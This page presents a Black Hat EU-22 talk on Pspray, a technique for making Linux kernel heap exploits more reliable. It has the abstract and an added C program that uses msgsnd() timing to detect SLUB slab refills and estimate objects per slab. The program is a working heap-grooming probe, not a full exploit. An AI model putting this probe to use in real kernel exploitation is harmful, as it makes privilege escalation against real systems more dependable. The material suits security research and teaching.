Slides -> http://i.blackhat.com/EU-22/Wednesday-Briefings/EU-22-Lee-Perfect-Spray.pdf

Reliable exploitation is the key requirement for highly targeted, high-value attacks such as APT campaigns. If exploitation is not reliable, an attempt may be fragile and fail (for example with a kernel crash or panic), which is easily noticed by others. This unexpected exposure results in a tremendous loss: the 0-day vulnerability information is burned, along with the engineering cost of developing the exploit.
In this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel that dramatically improves exploitation reliability. In particular, we designed a heap exploitation technique that is effective for most memory vulnerabilities, including heap out-of-bounds, use-after-free, and double-free. The key idea behind this new attack is a timing side channel in Linux's SLUB allocator. Using this side channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We applied Pspray's exploitation technique to 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.
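The abstract's central point, that allocation latency reveals when SLUB leaves its fast path, can be observed from user space. The program below is an added example written for this page; it is not code from the Pspray authors, the paper, or the slides. It assumes (a) that an allocation served from the per-CPU freelist is measurably cheaper than one that forces SLUB to fetch a new slab page, (b) that each msgsnd() call performs one kmalloc of the message header plus payload, so a 960-byte payload lands in the 1 KiB kmalloc cache on a typical x86-64 build, and (c) the reading of the abstract that once such a slow-path event is seen, the fresh slab holds exactly one object and a known number of free slots, which is what a reliable spray can then fill deterministically. The 4x-median threshold, the payload size, and the constructed timings in synthetic_demo() are this example's own choices.

```c
/* pspray_probe.c: observe SLUB's fast path vs slow path from user space.
 * Added illustration, not the Pspray authors' code.  Assumptions: a fresh
 * slab allocation (slow path) costs several times a freelist pop (fast path),
 * and one msgsnd() == one kmalloc of sizeof(struct msg_msg) + payload. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MAX_SAMPLES 8192

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n latencies; sorts a copy so the caller's sample order survives. */
uint64_t median_u64(const uint64_t *v, size_t n)
{
    uint64_t *tmp = malloc(n * sizeof *tmp);
    memcpy(tmp, v, n * sizeof *tmp);
    qsort(tmp, n, sizeof *tmp, cmp_u64);
    uint64_t m = tmp[n / 2];
    free(tmp);
    return m;
}

/* Flag every sample slower than factor * median as a slow-path allocation,
 * i.e. the moment SLUB handed out a fresh slab.  Returns the event count and
 * stores the sample indices in out_idx. */
size_t classify_slow_path(const uint64_t *lat, size_t n, double factor,
                          size_t *out_idx, size_t max_out)
{
    uint64_t med = median_u64(lat, n);
    size_t k = 0;
    for (size_t i = 0; i < n && k < max_out; i++)
        if ((double)lat[i] > factor * (double)med)
            out_idx[k++] = i;
    return k;
}

/* The gap between consecutive slow-path events is the number of objects the
 * cache packs into one slab; the most frequent gap filters out noise. */
size_t estimate_objs_per_slab(const size_t *idx, size_t k)
{
    static size_t hist[MAX_SAMPLES];
    memset(hist, 0, sizeof hist);
    size_t best = 0;
    for (size_t i = 1; i < k; i++) {
        size_t gap = idx[i] - idx[i - 1];
        if (gap < MAX_SAMPLES && ++hist[gap] > hist[best])
            best = gap;
    }
    return best;
}

/* Constructed timings (not measured): ~300 ns fast path, ~3 us slow path
 * every `period` allocations, with small jitter.  Checks the classifier
 * without touching the kernel.  Returns the estimated objects per slab. */
size_t synthetic_demo(size_t n, size_t period)
{
    static uint64_t lat[MAX_SAMPLES];
    static size_t idx[MAX_SAMPLES];
    if (n > MAX_SAMPLES || period == 0) return 0;
    for (size_t i = 0; i < n; i++)
        lat[i] = (i % period == 0) ? 3000 + (i % 7) * 10 : 300 + (i % 5) * 10;
    size_t k = classify_slow_path(lat, n, 4.0, idx, n);
    return estimate_objs_per_slab(idx, k);
}

static uint64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Time n msgsnd() calls of `payload` bytes.  Each call allocates one
 * struct msg_msg, so consecutive calls walk one kmalloc cache's freelist.
 * The per-queue byte limit is sidestepped by opening a new queue on EAGAIN. */
size_t probe_msgsnd(uint64_t *lat, size_t n, size_t payload)
{
    struct { long mtype; char mtext[4096]; } m = { .mtype = 1 };
    static int queues[MAX_SAMPLES];
    size_t nq = 0, i = 0;
    int q = -1;
    while (i < n && payload <= sizeof m.mtext) {
        if (q < 0) {
            if (nq == MAX_SAMPLES || (q = msgget(IPC_PRIVATE, IPC_CREAT | 0600)) < 0) break;
            queues[nq++] = q;
        }
        uint64_t t0 = now_ns();
        int rc = msgsnd(q, &m, payload, IPC_NOWAIT);
        uint64_t t1 = now_ns();
        if (rc < 0) {
            if (errno == EAGAIN) { q = -1; continue; }   /* queue full: next queue */
            break;
        }
        lat[i++] = t1 - t0;
    }
    for (size_t j = 0; j < nq; j++) msgctl(queues[j], IPC_RMID, NULL);
    return i;
}

int main(int argc, char **argv)
{
    static uint64_t lat[MAX_SAMPLES];
    static size_t idx[MAX_SAMPLES];
    size_t n = probe_msgsnd(lat, 4096, argc > 1 ? (size_t)atoi(argv[1]) : 960);
    if (n == 0) { perror("msgsnd"); return 1; }
    size_t k = classify_slow_path(lat, n, 4.0, idx, n);
    printf("%zu samples, median %llu ns, %zu slow-path events, ~%zu objects/slab\n",
           n, (unsigned long long)median_u64(lat, n), k, estimate_objs_per_slab(idx, k));
    return 0;
}
```

Build with `cc -O2 pspray_probe.c` and run pinned to one CPU (`taskset -c 0 ./a.out`) so the per-CPU slab is not shared with other runnable tasks; the live probe needs a Linux host with System V IPC enabled, while synthetic_demo() exercises the classification offline. On a busy system the slow samples form more than one tier, because refilling from a per-CPU or node partial slab is cheaper than allocating a new page, so the objects-per-slab estimate is only meaningful when the tallest tier repeats at a fixed period.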
No video of the talk is available.